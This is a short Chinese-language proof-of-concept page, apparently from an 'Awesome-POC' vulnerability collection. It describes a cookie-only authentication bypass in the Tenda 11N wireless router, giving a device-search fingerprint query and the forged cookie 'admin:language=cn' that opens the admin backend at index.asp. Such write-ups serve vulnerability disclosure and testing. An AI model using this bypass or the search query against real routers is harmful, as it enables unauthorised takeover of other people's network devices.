Awesome-POC/网络设备漏洞/Tenda 11N无线路由器 Cookie 越权访问漏洞.md
2024-11-06 14:10:36 +08:00

31 lines
490 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Tenda 11N无线路由器 Cookie 越权访问漏洞
## 漏洞描述
Tenda 11N无线路由器由于只验证Cookie导致任意用户伪造Cookie即可进入后台
## 漏洞影响
```
Tenda 11N无线路由器
```
## 网络测绘
```
app="TENDA-11N无线路由器"
```
## 漏洞复现
登录页面
![image-20220519180949727](images/202205191809768.png)
添加Cookie, 访问 index.asp 进入后台
```
admin:language=cn
```
![image-20220519181248549](images/202205191812628.png)